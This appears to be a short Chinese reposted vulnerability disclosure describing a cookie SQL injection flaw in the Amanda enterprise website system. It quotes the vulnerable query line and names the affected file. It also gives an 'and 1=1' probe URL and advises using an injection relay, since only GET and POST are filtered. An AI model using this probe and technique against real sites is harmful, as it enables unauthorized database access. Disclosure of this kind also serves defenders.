以下是引用片段: ShowSmallClassType=ShowSmallClassType_Article sql="select * from cg_Product where ID=" & ID & "" |
只过滤了 get post,存在 cookie 注射,注入中转即可。
amanda/cg_ProductShow.asp
http://localhost/jmCook.asp?jmdcw=169%20and%201=1
文章来源于lcx.cc:【0day】阿曼达企业网站系统 cookie 注入漏洞
相关推荐: 跨行、跨省银行卡间转账不用手续费?利用支付宝为什么不收手续费?
跨行、跨省银行卡间转账不用手续费? px1624 (aaaaaaaaa) | 2014-06-20 00:05 之前就想到如何可以跨行、跨省银行卡间转账不用手续费 然后试了试,果然可以啊。 利用支付宝等中间平台,比如卡1和卡2之间直接转账需要手续费。 那么先用…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论